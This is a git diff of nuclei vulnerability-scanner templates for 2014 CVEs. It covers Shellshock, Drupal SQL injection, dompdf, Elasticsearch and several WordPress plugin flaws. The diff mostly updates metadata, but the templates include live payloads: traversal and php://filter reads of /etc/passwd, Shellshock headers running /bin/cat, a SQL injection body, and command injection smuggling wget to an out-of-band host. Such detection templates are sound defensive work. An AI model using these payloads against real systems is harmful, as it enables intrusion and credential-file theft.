Inclusion author: 0x_Akoko,akincibor,ritikchaddha - severity: high + severity: medium description: | A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. reference: @@ -13,13 +13,17 @@ info: - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582 - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2014-2383 + cwe-id: CWE-200 + epss-score: 0.00723 + cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: max-request: 11 verified: true + vendor: dompdf + product: dompdf tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists http: @@ -38,19 +42,20 @@ http: - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: + - type: word + part: header + words: + - "application/pdf" + - 'filename="dompdf_out.pdf"' + condition: and + - type: regex regex: - "root:[x*]:0:0" - - type: word - words: - - "application/pdf" - - 'filename="dompdf_out.pdf"' - part: header - condition: and - - type: status status: - 200 diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 2e188fe5d5..255676e3d2 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -10,15 +10,20 @@ info: - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf - https://nvd.nist.gov/vuln/detail/CVE-2014-2908 - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02 + - http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-892012.pdf remediation: Upgrade to v4.0 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2014-2908 cwe-id: CWE-79 - tags: cve,cve2014,xss,siemens,edb + epss-score: 0.00594 + cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: siemens + product: simatic_s7_cpu_1200_firmware + tags: cve,cve2014,xss,siemens,edb http: - method: GET diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 054830da05..3038091383 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l - http://www.kb.cert.org/vuls/id/774788 - http://www.belkin.com/us/support-article?articleNum=109400 + - https://www.exploit-db.com/exploits/38488/ remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N cvss-score: 7.8 cve-id: CVE-2014-2962 cwe-id: CWE-22 - tags: cve,cve2014,lfi,router,firmware,traversal + epss-score: 0.95825 + cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: belkin + product: n150_f9k1009_firmware + tags: cve,cve2014,lfi,router,firmware,traversal http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index f253d982d2..a44cb5d98e 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -3,7 +3,7 @@ id: CVE-2014-3120 info: name: ElasticSearch v1.1.1/1.2 RCE author: pikpikcu - severity: critical + severity: medium description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. reference: @@ -11,14 +11,19 @@ info: - https://www.elastic.co/blog/logstash-1-4-3-released - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://bouk.co/blog/elasticsearch-rce/ + - https://www.elastic.co/community/security/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2014-3120 - tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic + cwe-id: CWE-284 + epss-score: 0.58403 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elasticsearch + product: elasticsearch + tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic http: - raw: @@ -49,14 +54,14 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - part: header - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 211404160b..3e8d8748a8 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -14,9 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2014-3206 cwe-id: CWE-20 - tags: cve,cve2014,seagate,rce,edb + epss-score: 0.54403 + cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: seagate + product: blackarmor_nas_220_firmware + tags: cve,cve2014,seagate,rce,edb http: - raw: @@ -24,7 +28,6 @@ http: GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 022f1df1f7..3f91d4084b 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -19,11 +19,14 @@ info: cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 + epss-score: 0.97529 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"drupal" + vendor: drupal + product: drupal tags: edb,cve,cve2014,drupal,sqli - variables: num: "999999999" @@ -31,16 +34,17 @@ http: - method: POST path: - "{{BaseURL}}/?q=node&destination=node" + body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a' matchers-condition: and matchers: - type: word + part: body words: - "PDOException" - '{{md5({{num}})}}' condition: and - part: body - type: status status: diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 1cfa729b6f..de71d819bb 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -10,14 +10,19 @@ info: - https://github.com/advisories/GHSA-69rr-wvh9-6c4q - https://snyk.io/vuln/npm:st:20140206 - https://nodesecurity.io/advisories/st_directory_traversal + - http://www.openwall.com/lists/oss-security/2014/05/13/1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2014-3744 cwe-id: CWE-22 - tags: cve,cve2014,lfi,nodejs,st + epss-score: 0.00672 + cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nodejs + product: node.js + tags: cve,cve2014,lfi,nodejs,st http: - method: GET @@ -26,9 +31,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 96b1feb895..e8dd39dede 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html + - http://seclists.org/fulldisclosure/2014/Dec/23 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo - tags: cve,cve2014,weblogic,oracle,ssrf,oast + epss-score: 0.96955 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: fusion_middleware + tags: seclists,cve,cve2014,weblogic,oracle,ssrf,oast http: - method: GET @@ -26,11 +31,11 @@ http: matchers-condition: and matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + - type: status status: - 200 - - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 7ff7ff7aec..fea1ded33b 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -10,12 +10,17 @@ info: - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-4513 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00145 + cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/activehelper-livehelp" + framework: wordpress + vendor: activehelper + product: activehelper_livehelp_live_chat tags: cve,cve2014,wordpress,xss,wp-plugin http: @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 50a4248536..7949471a6e 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4535 cwe-id: CWE-79 - cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth + cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: import_legacy_media_project + product: import_legacy_media + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index f021007756..73319e63ff 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 - cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:*:*:* epss-score: 0.00149 + cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" + framework: wordpress + vendor: katz + product: infusionsoft_gravity_forms tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: @@ -30,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 14399a497b..df1c8f6d24 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4539 cwe-id: CWE-79 - cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth + cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: movies_project + product: movies + tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 8123dd1a22..726abc9a94 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 - cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:*:*:* epss-score: 0.00118 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth + cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: podcast_channels_project + product: podcast_channels + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 171354f1e5..9483e844c5 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4550 cwe-id: CWE-79 - cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:*:*:* epss-score: 0.00135 + cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/shortcode-ninja" + framework: wordpress + vendor: visualshortcodes + product: ninja tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth http: @@ -29,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index f7dd5da187..40cf362e53 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 - cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth + cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: cybercompany + product: swipehq-payment-gateway-woocommerce + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 1040f59352..40f279eea4 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4561 cwe-id: CWE-79 - cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:*:*:*:*:*:*:*:* epss-score: 0.00098 - tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth + cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: ultimate-weather_project + product: ultimate-weather + tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index f4144e1d81..e17395c8c0 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4592 cwe-id: CWE-79 - cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:*:*:* epss-score: 0.00135 + cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-planet" + framework: wordpress + vendor: czepol + product: wp-planet tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth http: @@ -29,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 65a425a42f..4e3bf6b71e 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -3,20 +3,25 @@ id: CVE-2014-4940 info: name: WordPress Plugin Tera Charts - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-4940 + cwe-id: CWE-22 + epss-score: 0.03891 + cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/tera-charts" + framework: wordpress + vendor: tera_charts_plugin_project + product: tera-charts tags: cve,cve2014,wordpress,wp-plugin,lfi http: @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 081b56d92c..3632830561 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -3,7 +3,7 @@ id: CVE-2014-4942 info: name: WordPress EasyCart <2.0.6 - Information Disclosure author: DhiyaneshDk - severity: low + severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. reference: @@ -11,13 +11,20 @@ info: - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail= classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-4942 cwe-id: CWE-200 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure + epss-score: 0.01024 + cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: levelfourdevelopment + product: wp-easycart + tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure http: - method: GET @@ -39,7 +46,7 @@ http: extractors: - type: regex - part: body group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' + part: body diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 47e4da4d08..c1a1eb9827 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -3,20 +3,24 @@ id: CVE-2014-5111 info: name: Fonality trixbox - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. reference: - https://www.exploit-db.com/exploits/39351 - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-5111 - tags: packetstorm,cve,cve2014,lfi,trixbox,edb + cwe-id: CWE-22 + epss-score: 0.0445 + cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netfortris + product: trixbox + tags: packetstorm,cve,cve2014,lfi,trixbox,edb http: - method: GET @@ -25,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 22337b5976..e19eb46c6f 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -3,21 +3,26 @@ id: CVE-2014-5258 info: name: webEdition 6.3.8.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-5258 - https://www.exploit-db.com/exploits/34761 - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0 + - http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N cvss-score: 4 cve-id: CVE-2014-5258 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2014,lfi + epss-score: 0.01386 + cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: webedition + product: webedition_cms + tags: edb,packetstorm,cve,cve2014,lfi http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 3af899c0e6..d8c0b70213 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -3,20 +3,26 @@ id: CVE-2014-5368 info: name: WordPress Plugin WP Content Source Control - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-5368 - https://www.exploit-db.com/exploits/39287 - http://seclists.org/oss-sec/2014/q3/417 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/95374 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-5368 cwe-id: CWE-22 + epss-score: 0.08268 + cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-source-control" + framework: wordpress + vendor: wp_content_source_control_project + product: wp_content_source_control tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists http: @@ -27,10 +33,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - part: body condition: and - type: status diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index e4ab574638..1da67e0e8b 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -10,16 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A + - http://advisories.mageia.org/MGASA-2014-0388.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-6271 cwe-id: CWE-78 - cpe: cpe:2.3:a:gnu:bash:*:*:*:*:*:*:*:* - epss-score: 0.9756 - tags: cve,cve2014,rce,shellshock,kev + epss-score: 0.97566 + cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 + vendor: gnu + product: bash + tags: cve,cve2014,rce,shellshock,kev http: - method: GET @@ -33,19 +36,20 @@ http: - "{{BaseURL}}/debug.cgi" - "{{BaseURL}}/cgi-bin/test-cgi" + stop-at-first-match: true + headers: Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex part: body regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 9dffd38eb5..02ecc35cd5 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -1,4 +1,4 @@ -id: CVE-2014-6287 +id: 'CVE-2014-6287' info: name: HTTP File Server <2.3c - Remote Command Execution @@ -15,16 +15,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2014-6287 + cve-id: 'CVE-2014-6287' cwe-id: CWE-94 + epss-score: 0.97315 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* - epss-score: 0.97414 metadata: max-request: 1 shodan-query: http.favicon.hash:2124459909 verified: true + vendor: rejetto + product: http_file_server tags: packetstorm,msf,cve,cve2014,hfs,rce,kev - variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index e8c35b0343..382394a121 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -3,21 +3,26 @@ id: CVE-2014-6308 info: name: Osclass Security Advisory 3.4.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. reference: - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2014-6308 - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 - https://www.netsparker.com/lfi-vulnerability-in-osclass/ + - http://blog.osclass.org/2014/09/15/osclass-3-4-2-ready-download/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-6308 cwe-id: CWE-22 - tags: cve,cve2014,lfi,packetstorm + epss-score: 0.0922 + cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: osclass + product: osclass + tags: cve,cve2014,lfi,packetstorm http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 